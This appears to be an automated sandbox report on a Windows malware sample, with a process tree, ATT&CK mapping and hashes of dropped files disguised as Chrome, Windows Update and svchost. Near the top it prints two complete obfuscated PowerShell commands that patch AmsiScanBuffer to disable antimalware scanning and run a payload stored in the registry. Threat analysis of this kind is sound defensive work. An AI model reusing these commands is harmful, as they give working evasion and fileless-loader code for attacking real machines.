C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:SUHeoxjGVYWt{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$tgYJHztgUldpQn,[Parameter(Position=1)][Type]$LhtgiNJxbQ)$PHTgnzEEgew=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$PHTgnzEEgew.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$tgYJHztgUldpQn).SetImplementationFlags('Runtime,Managed');$PHTgnzEEgew.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LhtgiNJxbQ,$tgYJHztgUldpQn).SetImplementationFlags('Runtime,Managed');Write-Output $PHTgnzEEgew.CreateType();}$mnoswIzYVKAbM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$TawjchRZTucIeQ=$mnoswIzYVKAbM.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ROHGGgpITTHEkgYbmzq=SUHeoxjGVYWt @([String])([IntPtr]);$ZANUwRAdtbCGFccRhFzAJl=SUHeoxjGVYWt @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YvVOjixLFnM=$mnoswIzYVKAbM.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$IeNSMEdMzXLABQ=$TawjchRZTucIeQ.Invoke($Null,@([Object]$YvVOjixLFnM,[Object]('Load'+'LibraryA')));$SFOporACNweezwKFr=$TawjchRZTucIeQ.Invoke($Null,@([Object]$YvVOjixLFnM,[Object]('Vir'+'tual'+'Pro'+'tect')));$yzzUXfH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IeNSMEdMzXLABQ,$ROHGGgpITTHEkgYbmzq).Invoke('a'+'m'+'si.dll');$JkCNVjyKWyZnKKOMF=$TawjchRZTucIeQ.Invoke($Null,@([Object]$yzzUXfH,[Object]('Ams'+'iSc'+'an'+'Buffer')));$FYIOJqpwUe=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SFOporACNweezwKFr,$ZANUwRAdtbCGFccRhFzAJl).Invoke($JkCNVjyKWyZnKKOMF,[uint32]8,4,[ref]$FYIOJqpwUe);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$JkCNVjyKWyZnKKOMF,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SFOporACNweezwKFr,$ZANUwRAdtbCGFccRhFzAJl).Invoke($JkCNVjyKWyZnKKOMF,[uint32]8,0x20,[ref]$FYIOJqpwUe);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2708

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ekqyyXbMIttY{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JzLzVyUaUaxHxC,[Parameter(Position=1)][Type]$WHPBpSOlCk)$eaYZhWRcXeV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$eaYZhWRcXeV.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$JzLzVyUaUaxHxC).SetImplementationFlags('Runtime,Managed');$eaYZhWRcXeV.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$WHPBpSOlCk,$JzLzVyUaUaxHxC).SetImplementationFlags('Runtime,Managed');Write-Output $eaYZhWRcXeV.CreateType();}$WAYbbLmAMSXXG=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$wOyIngqHOkrGwe=$WAYbbLmAMSXXG.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$pFcyetikoGhJRoaQBgS=ekqyyXbMIttY @([String])([IntPtr]);$yMPZQoajYZtFYGxMBToLUQ=ekqyyXbMIttY @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$yvTdLQGzXbd=$WAYbbLmAMSXXG.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$ZUkOhvhXnvwuGr=$wOyIngqHOkrGwe.Invoke($Null,@([Object]$yvTdLQGzXbd,[Object]('Load'+'LibraryA')));$fosBPsUgcBpVazKMg=$wOyIngqHOkrGwe.Invoke($Null,@([Object]$yvTdLQGzXbd,[Object]('Vir'+'tual'+'Pro'+'tect')));$lEcWjIU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZUkOhvhXnvwuGr,$pFcyetikoGhJRoaQBgS).Invoke('a'+'m'+'si.dll');$QWdmBQkTzXltQFMfR=$wOyIngqHOkrGwe.Invoke($Null,@([Object]$lEcWjIU,[Object]('Ams'+'iSc'+'an'+'Buffer')));$AledkbfHJx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fosBPsUgcBpVazKMg,$yMPZQoajYZtFYGxMBToLUQ).Invoke($QWdmBQkTzXltQFMfR,[uint32]8,4,[ref]$AledkbfHJx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QWdmBQkTzXltQFMfR,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fosBPsUgcBpVazKMg,$yMPZQoajYZtFYGxMBToLUQ).Invoke($QWdmBQkTzXltQFMfR,[uint32]8,0x20,[ref]$AledkbfHJx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:2684

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:908

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:412

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:348

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1592

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3112

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s W32Time
1⤵
PID:1148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2116

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
1⤵
PID:3348

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A12.tmp.csv

MD5
fa9dd6c6475419acee478765af0cd890

SHA1
74bee8b48d00f24b04f4b8b2a53a6f5a309739ee

SHA256
3486c6e7a82923f6e6bfa2d41880b68d3aebdc29822e241f358d8b0bbf152800

SHA512
af7cc59804faad7192425cf8388a670bba3eb0aa37ec31dec90adb5ec26e86da81d3e0c06e1587d061c55e1587e9770b24739001fc9b8fc5250def4cf5bad84a

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A62.tmp.txt

MD5
787a679850e7992334f4398d399365ea

SHA1
3bc88ea3bef3910cdc090eed0804d8ebfbbfe4bd

SHA256
f490208c92fe64a012880c2106d4d9391f18a52e2308cfd8e5a3a57c477ad3bb

SHA512
9e5608ebb40bf8d7f8415666c366318e9a88c8f69885598ee83f58a58c29e4a38d8276e45792786171cf32c0748d5296e7c2419d526adc4bb41b215baf0fc90d

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5BCA.tmp.csv

MD5
f7bcd8312a8fdb5f91255ea17577cffd

SHA1
a709da60b08831c0f57a8ced4ec6f51c61a6c1f9

SHA256
8fee0d13b9f6aa4bd891c8ca974cb8825cf3f7f872f1e30a15553b8004b5390c

SHA512
b63da2c66327f5bffb2b9ca58863c26a06476f3c9fbc6b809c92385c49c1a75684c065ae64abe9735bcbdd1985a8c7647abfc8a7fdbc2ed7cbe44eef00a5a238

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5BEA.tmp.txt

MD5
0b1197e4651f5c9d589e2bc798118846

SHA1
e1740a6554fc2325dbcf1b00908b74cea86c781e

SHA256
9a3504ec6c6060a6cc0fd643939b021bb879b7ed4c2b4511448457995688806c

SHA512
7ce4a082bfec64490357d2a5459f34f4dead604d21555bc8c68dcd7b88ebaeb48d16f9a9d2ecf5029888efb5334ae0a0832ea86f7cb3aa05543c9363ef1854bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
984c4b5d498fbe2602436910b6a7b29f

SHA1
2fd0e193e82e8ad05c271b4dd09e46292d70910a

SHA256
031028bb30ec71f20e91f82db3cdb63f7d674de96bfd3ace59329efe92eb5bf2

SHA512
d805396941ac1d891f7a5211aab35c17c7dd1c3947a6672fc053ce69ec3e5310dae2b212955044b5f2dcf85013b486c3b02532eb32ce3ba46490858f15529c22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
a19b9a3dbdca49b2f85333e2a7844266

SHA1
ee43cb3d055c28dad90ef92b9dd378c178efeca8

SHA256
e1ed580626c2da6d4cf97cf097012b8e9b6becf16de7f50c6154d501e9d43828

SHA512
e109fb20dafe0d87a8a0e5cd85ef6096e0f10caa3b9477f9b32413eb2a19254e59e1920ca5afcf102ea32509ab68b180a9227f1bac0977044b13e2b4e50ea0fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
21ee80e9457f1f3f4d6ebef15d31c207

SHA1
930fa5143dd1faf0028f65ad9c346b72c2bb70eb

SHA256
e33bd5d5f209ebdffcbabfbb57e2e6a1e42bf0c366aaaedf9087d3c37d14c94b

SHA512
4efc0236bca8e5dfc04d11ccb6137f280101282ade2c1fbe0abeecae6bdf19a35b6f3f1bc6ce69c1b2c6bedfa9fab3abc7cc9cf4485c9cbe148a2ec60da615e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
2d003aeb1bc1663789f2b4b4aa9869c1

SHA1
51023351ce5cb0ceaeb93b9f2ef7a0ec2f167acf

SHA256
6f2331d84442654765c9e075888e19f1069416cb0aeef55df59bbe2e30ccae7a

SHA512
14090099ba5da2c4662463b67a3ddc6e530dd10a585819f349a552be959757535059f4595b36739b38ee018070791252cc9cad27a410b7e04cb5833af7d934b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
024650c0dc9106156b6987a13b1cd43f

SHA1
923617531fca3a61c12dba44e06cbf32c48a7e58

SHA256
a3a0a0e0c87c9341a5414de580a8301126b31c73d0d1def3ee5d3978dbde1940

SHA512
93d2523ffddd2de0476a252f153b4833b6947aa54ff5331c8c60296dc6da3ee3e969bf6c661839dd927e2942a5c32d3654aac717cd96f08eb077916365531cb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
95e2edbe41d1606e2588539acc9e7a47

SHA1
dbd2c925bbefb996cdc71ee87f5d5158b8a89f7d

SHA256
70f598699f5ecb0881542612022e8d405aaab73016c6ecd7248e803eca8cb79a

SHA512
7b5b7293576eacb8463d1cb16aaa2ce2b4729748f1870122bdcff546ccb6a722a5e47156c9ee752a0477a6e3fb725b55eea4ddb24daab60af6a691d495ccc875

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
82484d508c733e5a5e465c1e304914ca

SHA1
30f1f0737870333fb657169f6ea565235a1b66be

SHA256
e86466a78df6e8e8421934bb00e66fe2030859dcbe840968ceaadc094aec999c

SHA512
14d85924f888e7c05497c53b529b6d11f1ac63731a9a739f8681f0a9982b59b1e8d9660ef39f4a16d8acaf86c40dd92d4935b7228b1188c269447e1f404329de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
b1657d11fae9846cb282200436ff2c3f

SHA1
52ffb551fbfeea7aeb074cdd4cab85058814d554

SHA256
b088382e6c6c703286e482c15292fd837b634b9a05e1861bc344331f0251e6fc

SHA512
4f26c4faf52bbaf0156799313d8f64a0cf9759cf2e8973d8dd766cc1ef2389b2a9e312e6540993fd86339ed5778028c84c62961dc9ed5bcbf3a16221862e82f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
c76fc490e436b41d0a4db1627a091f73

SHA1
d6f08338f2b891335106c76f1e5eec1c8d04e192

SHA256
3b7607cafc73a466901c3d79f273421cd514223e1b03604ecee0cabeed320d0c

SHA512
ea9d44a6b716cc4840c1925033b8ddd21b032ac279233abd1273ba35290608204a82512ac73601772db7855af70d1cb470d6f3b5c78e0b39dd0be58b5de12014

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
5898665277d37e962de1e67e456b23ae

SHA1
26fb81cd15e562d9cc308233b780d7c232f7097b

SHA256
fc93963f9480464f5caccdbc535460a9e942531793e5301dfd0b08efc4d4d6d1

SHA512
4288b00e0face57db07c5c0d330808a0de130d6829372d051372bdd69c73142ffe47c4f73f5d6815076103bb710e92a98b593c5f6e14dc780266aa07e7464804

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
873404c6d20f9d4d2b1f104eba91c16f

SHA1
b59cdec3ebce90ffe1f9a8141661450c1af5040e

SHA256
6e4e7a6a9256b80a6532a1c18ba977fa99c8fb059b94470c9b2fad531353e03d

SHA512
ada48774462e71b42050e5236c40d04476418ac614ce242c7bc1a6dd8a3584e4d2c99a4d4d046f9b4274ef5123bed2e72ae4bef935807daf784efbbe230185a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
a56276cbeffac9ac6b156146e77c9038

SHA1
f4c1ec0308b941f6f1e78d212d138981d07fa3fc

SHA256
c6524d69b21841d071b1d98ff8ee3921b5e01e88adb217b93cba8a57785feb3e

SHA512
b7910675f0cb545c18f60a332433c8944dc7d367120c6999d69e00e4dabafdadb02344cafdd11c448315ec6978b05063a350ede5ae6ba05daf079cfb9b1e6901

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
880f147975ceb6591f01bd6dfa7ecb0c

SHA1
819b4b4f41b037cad359c278a928f49f5434f754

SHA256
acac0e7c91cd686d0ff4de216dff28748fab126baf6c1d02cb9fde46bd85953b

SHA512
f0ba531c7c421503cd46ca8beb8eb43e1dba8564c4b6cd4d12387f28ce38905ffd116bd569a35c039f3306c4ac0777ac001f90c8eec82a769d1e47847f2f1c1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
97e5ea277bc1dd5567ad55759cb6ba26

SHA1
45a0cb2f1929c6705f6fa06972ccc2a805dfd9cb

SHA256
4a6f02669d88c75684f021a0b08f797a80f405f0247b386192374bae703c253e

SHA512
a56189ad85527d0d28f8420db751f06443ac6b3baa88af4b04efd82a14ef20d99995c2ffe42506454bf2e293471d40e48d3af2cc43ea6c6417de41c71a7774f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
97e5ea277bc1dd5567ad55759cb6ba26

SHA1
45a0cb2f1929c6705f6fa06972ccc2a805dfd9cb

SHA256
4a6f02669d88c75684f021a0b08f797a80f405f0247b386192374bae703c253e

SHA512
a56189ad85527d0d28f8420db751f06443ac6b3baa88af4b04efd82a14ef20d99995c2ffe42506454bf2e293471d40e48d3af2cc43ea6c6417de41c71a7774f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
0878765f9caed1a84f4c18b8eafd5988

SHA1
6627b99d3f9f0230134639f4891ab6c3d0c8ed87

SHA256
67fc730a38595227dc95845c9d5505c1ba77c31f1b2f50cc068e3ce7c5adf8a1

SHA512
b47f0760182c1e47e955676cc2846411fccc1f339b6569570948d7e83d827086c80444dae1a62ca04de252413c7bfa91f9ac3e9ccc53071df54f9c0b60b59571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
0878765f9caed1a84f4c18b8eafd5988

SHA1
6627b99d3f9f0230134639f4891ab6c3d0c8ed87

SHA256
67fc730a38595227dc95845c9d5505c1ba77c31f1b2f50cc068e3ce7c5adf8a1

SHA512
b47f0760182c1e47e955676cc2846411fccc1f339b6569570948d7e83d827086c80444dae1a62ca04de252413c7bfa91f9ac3e9ccc53071df54f9c0b60b59571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
0878765f9caed1a84f4c18b8eafd5988

SHA1
6627b99d3f9f0230134639f4891ab6c3d0c8ed87

SHA256
67fc730a38595227dc95845c9d5505c1ba77c31f1b2f50cc068e3ce7c5adf8a1

SHA512
b47f0760182c1e47e955676cc2846411fccc1f339b6569570948d7e83d827086c80444dae1a62ca04de252413c7bfa91f9ac3e9ccc53071df54f9c0b60b59571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
984c4b5d498fbe2602436910b6a7b29f

SHA1
2fd0e193e82e8ad05c271b4dd09e46292d70910a

SHA256
031028bb30ec71f20e91f82db3cdb63f7d674de96bfd3ace59329efe92eb5bf2

SHA512
d805396941ac1d891f7a5211aab35c17c7dd1c3947a6672fc053ce69ec3e5310dae2b212955044b5f2dcf85013b486c3b02532eb32ce3ba46490858f15529c22

Download Submit
C:\Users\Admin\AppData\Local\Temp\CHROME UPDATE.EXE

MD5
0097f768c3d8c2bb8f03f62e227dfc8a

SHA1
a58b4f7e2c8e814a9bdd84362f554e07bc93eaf7

SHA256
a8a600735f68498af695ad4500fc153cb22ce6a04dc1e8db382a185af710368e

SHA512
5457ffd3cd953a1df98776d37218f94e88494d0263939860277661321b22aae605316d3061788282e9e3c303a9d4d27bbd7a1b376ac3204f3e8de64cf6fb3c08

Download Submit
C:\Users\Admin\AppData\Local\Temp\CHROME UPDATE.EXE

MD5
0097f768c3d8c2bb8f03f62e227dfc8a

SHA1
a58b4f7e2c8e814a9bdd84362f554e07bc93eaf7

SHA256
a8a600735f68498af695ad4500fc153cb22ce6a04dc1e8db382a185af710368e

SHA512
5457ffd3cd953a1df98776d37218f94e88494d0263939860277661321b22aae605316d3061788282e9e3c303a9d4d27bbd7a1b376ac3204f3e8de64cf6fb3c08

Download Submit
C:\Users\Admin\AppData\Local\Temp\CHROME.EXE

MD5
522967bd7cf9c8ca72ea418316fb1766

SHA1
bbc7e5fb8600a4ec86d15fd511fa2d00918b3626

SHA256
86c43915d81769522d2ca2a0a43907a624502355a109286e121c5cf363d6ba36

SHA512
de054c47fc7861c39aebc8b46ae064a49e8c5347894482c5921ed319d6df61305eb8e606f77d23d708f2dffc4c0881d53f7f890331815a3581b96cb1ed9b68c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\CHROME.EXE

MD5
522967bd7cf9c8ca72ea418316fb1766

SHA1
bbc7e5fb8600a4ec86d15fd511fa2d00918b3626

SHA256
86c43915d81769522d2ca2a0a43907a624502355a109286e121c5cf363d6ba36

SHA512
de054c47fc7861c39aebc8b46ae064a49e8c5347894482c5921ed319d6df61305eb8e606f77d23d708f2dffc4c0881d53f7f890331815a3581b96cb1ed9b68c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\GOOGLE CHROME.EXE

MD5
57c55fda46addb304afe6ae1e556349d

SHA1
3d710a7e837dad90d8beb7be57caa5aa6f2f5b2f

SHA256
de4e562c74f0e15ff99add8883953ad5fae2856be71f2f6b5988bffd314ac6e7

SHA512
f188651e4662233a5690acbe96338772dc520961f08f457f255ae783293f80ceb7b13855c7de3fc7c65e64f22e0eca87f1bb72fa9d7d691392761c74eb91fe3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\GOOGLE CHROME.EXE

MD5
57c55fda46addb304afe6ae1e556349d

SHA1
3d710a7e837dad90d8beb7be57caa5aa6f2f5b2f

SHA256
de4e562c74f0e15ff99add8883953ad5fae2856be71f2f6b5988bffd314ac6e7

SHA512
f188651e4662233a5690acbe96338772dc520961f08f457f255ae783293f80ceb7b13855c7de3fc7c65e64f22e0eca87f1bb72fa9d7d691392761c74eb91fe3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\NOTEPAD.EXE

MD5
5e54a1c7a9157dfa8a6fd04ccbf552ee

SHA1
ee2007d8c10d5a5b6eeae1a28c3ec1b4614cbd3b

SHA256
8edeafcac47a8afdb8812fe48da3941e659a260e0509b67983a158d5debdd308

SHA512
32733a9ece59b0958c29e19e8d154af201e00146c3d4eca4792d2f83c914b5d2f16837999d2216721d5537836b4ddb0ec8b0c174959ce7daced2fbd3d61baae7

Download Submit
C:\Users\Admin\AppData\Local\Temp\NOTEPAD.EXE

MD5
5e54a1c7a9157dfa8a6fd04ccbf552ee

SHA1
ee2007d8c10d5a5b6eeae1a28c3ec1b4614cbd3b

SHA256
8edeafcac47a8afdb8812fe48da3941e659a260e0509b67983a158d5debdd308

SHA512
32733a9ece59b0958c29e19e8d154af201e00146c3d4eca4792d2f83c914b5d2f16837999d2216721d5537836b4ddb0ec8b0c174959ce7daced2fbd3d61baae7

Download Submit
C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE

MD5
b30bd52a30d2035d5ef49b9b89575f81

SHA1
9062331b82003031cdf20dd7a35d9903c6d3a161

SHA256
2d2ceb896bf2f2af272245a052c936a9e45df7bded60a09ba3a1debc3aff1c4c

SHA512
a133f36adacf045150cc3ec8908b15e2bb9aca4487a10d9113c0e102cda4212f6e50483fa75ef46550aad44e8395881b8863e6d64fb55747e080132ebd75d1fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE

MD5
b30bd52a30d2035d5ef49b9b89575f81

SHA1
9062331b82003031cdf20dd7a35d9903c6d3a161

SHA256
2d2ceb896bf2f2af272245a052c936a9e45df7bded60a09ba3a1debc3aff1c4c

SHA512
a133f36adacf045150cc3ec8908b15e2bb9aca4487a10d9113c0e102cda4212f6e50483fa75ef46550aad44e8395881b8863e6d64fb55747e080132ebd75d1fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\WINDOWS UPDATE.EXE

MD5
d157b480e55e02d5eb5af195f7eaf41a

SHA1
264d93242c3d3ef3640d6c6548e5cb7a088e8d5c

SHA256
b4a63629d1d2c8b7320b1372cf46e3e0c05bf1d1ddf7f89deb644aacf9e51f3b

SHA512
b139d58a899306ae16db844dacf7975e1ea4fd9f4c6dde30730bc7ddc850e3033cf5c60cb9ddd743984728b81f1f3c4dc8b8ca19b00b85dc3f447d0a1072a815

Download Submit
C:\Users\Admin\AppData\Local\Temp\WINDOWS UPDATE.EXE

MD5
d157b480e55e02d5eb5af195f7eaf41a

SHA1
264d93242c3d3ef3640d6c6548e5cb7a088e8d5c

SHA256
b4a63629d1d2c8b7320b1372cf46e3e0c05bf1d1ddf7f89deb644aacf9e51f3b

SHA512
b139d58a899306ae16db844dacf7975e1ea4fd9f4c6dde30730bc7ddc850e3033cf5c60cb9ddd743984728b81f1f3c4dc8b8ca19b00b85dc3f447d0a1072a815

Download Submit
C:\Users\Admin\AppData\Local\Temp\WINDOWS.EXE

MD5
8ff3198dbd93b447202687b8aa137f83

SHA1
aa33a67075d4a5d0a73d8efa98b9ffa3d9efc1f2

SHA256
8e0a8ec3a6504e973530c5cc92f9f304b5858bc7eac627eb7d4d4347b407dd59

SHA512
f97b66d21f757cdfe58d5f504b1cd5267dbcbb515afb3a932a73154fc3de3f027346540ad2483b9b3aeef22ddd3e7a446f76bb96319fd6b4ab9b37ff67174be7

Download Submit
C:\Users\Admin\AppData\Local\Temp\WINDOWS.EXE

MD5
8ff3198dbd93b447202687b8aa137f83

SHA1
aa33a67075d4a5d0a73d8efa98b9ffa3d9efc1f2

SHA256
8e0a8ec3a6504e973530c5cc92f9f304b5858bc7eac627eb7d4d4347b407dd59

SHA512
f97b66d21f757cdfe58d5f504b1cd5267dbcbb515afb3a932a73154fc3de3f027346540ad2483b9b3aeef22ddd3e7a446f76bb96319fd6b4ab9b37ff67174be7

Download Submit
C:\Users\Admin\AppData\Local\Temp\server.exe

MD5
d157b480e55e02d5eb5af195f7eaf41a

SHA1
264d93242c3d3ef3640d6c6548e5cb7a088e8d5c

SHA256
b4a63629d1d2c8b7320b1372cf46e3e0c05bf1d1ddf7f89deb644aacf9e51f3b

SHA512
b139d58a899306ae16db844dacf7975e1ea4fd9f4c6dde30730bc7ddc850e3033cf5c60cb9ddd743984728b81f1f3c4dc8b8ca19b00b85dc3f447d0a1072a815

Download Submit
C:\Users\Admin\AppData\Local\Temp\server.exe

MD5
d157b480e55e02d5eb5af195f7eaf41a

SHA1
264d93242c3d3ef3640d6c6548e5cb7a088e8d5c

SHA256
b4a63629d1d2c8b7320b1372cf46e3e0c05bf1d1ddf7f89deb644aacf9e51f3b

SHA512
b139d58a899306ae16db844dacf7975e1ea4fd9f4c6dde30730bc7ddc850e3033cf5c60cb9ddd743984728b81f1f3c4dc8b8ca19b00b85dc3f447d0a1072a815

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\services.exe

MD5
522967bd7cf9c8ca72ea418316fb1766

SHA1
bbc7e5fb8600a4ec86d15fd511fa2d00918b3626

SHA256
86c43915d81769522d2ca2a0a43907a624502355a109286e121c5cf363d6ba36

SHA512
de054c47fc7861c39aebc8b46ae064a49e8c5347894482c5921ed319d6df61305eb8e606f77d23d708f2dffc4c0881d53f7f890331815a3581b96cb1ed9b68c4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\services.exe

MD5
522967bd7cf9c8ca72ea418316fb1766

SHA1
bbc7e5fb8600a4ec86d15fd511fa2d00918b3626

SHA256
86c43915d81769522d2ca2a0a43907a624502355a109286e121c5cf363d6ba36

SHA512
de054c47fc7861c39aebc8b46ae064a49e8c5347894482c5921ed319d6df61305eb8e606f77d23d708f2dffc4c0881d53f7f890331815a3581b96cb1ed9b68c4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\servicesupdate.exe

MD5
0097f768c3d8c2bb8f03f62e227dfc8a

SHA1
a58b4f7e2c8e814a9bdd84362f554e07bc93eaf7

SHA256
a8a600735f68498af695ad4500fc153cb22ce6a04dc1e8db382a185af710368e

SHA512
5457ffd3cd953a1df98776d37218f94e88494d0263939860277661321b22aae605316d3061788282e9e3c303a9d4d27bbd7a1b376ac3204f3e8de64cf6fb3c08

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\servicesupdate.exe

MD5
0097f768c3d8c2bb8f03f62e227dfc8a

SHA1
